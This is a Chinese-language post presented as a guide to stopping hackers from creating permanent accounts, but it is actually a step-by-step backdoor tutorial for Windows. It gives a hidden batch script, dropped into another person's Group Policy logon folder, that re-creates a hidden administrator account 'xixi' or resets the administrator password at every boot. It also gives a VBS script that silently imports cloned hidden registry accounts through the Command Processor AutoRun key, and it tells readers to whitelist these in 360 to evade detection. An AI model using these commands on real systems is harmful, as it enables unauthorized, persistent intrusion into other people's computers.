防止黑客建立永久帐号的步骤 拦截重建账号的方法

windows下建立永久帐号方法，搞服务器安全的朋友也需要学习下，防止黑客建立永久帐号。

操作步骤：

1、在自己电脑里面建立一个.txt文本文件.

2、在里面输入内容：

@echo off

net user xixi 123456 /add 注释：前面xixi是用户名后面123456是密码；

net localgroup administrators xixi /add

3、把这个文件保存，更改后缀为xixi.bat 注释：前面名字随便，后面格式一定要是bat；

4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下，没有的话自己创建。别忘了将文件属性设为“隐藏”哦！

完成，下次对方电脑无论如何都有这个管理员帐号，删除了，下次启动还有！

如果把里面的内容改成：

@echo off

net user administrator 123456 /add

意思是不管你怎么改，下次启动管理员帐号administrator密码一直是123456

作者：xixi

逍遥复仇点评：以上应该对应的就是组策略里计算机管理中的“登录”和“注销”脚本，打开gpedit.msc找找看，听说此法360能检测出来，我是没有试，你可以先用360扫一下如果能查出来将其设为信任就OK了！

强调一下本文貌似要配合《安静运行批处理vbs脚本》才算是完美！既然都走到这里了《建立超级隐藏账号方法》这篇也一起看了吧！

另外一种命令行截持重建帐号的方法：

将已在注册中克隆好的帐号分别导出一份，比如"guest$.reg"和"0x3f5.reg"复制c:\windows\目录下，然后在同目录下建立一个cmd.vbs脚本内容如下：

On Error Resume Next

set yecha=wscript.createobject("wscript.shell")

yecha.run "regedit.exe /s guest$.reg",0

yecha.run "regedit.exe /s 0x3f5.reg",0

在注册表中这个项KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun里AutoRun键值中输入我们的脚本路径就OK。

（这个项起的作用是打开CMD自动运行我们编辑好的脚本文件）

提示：360安全卫士能查的出来显示为“命令行截持”，TNND，我把它加入信任了就没事了，管理员神精了会天天翻360那个不起眼的地方？

整理作者：逍遥复仇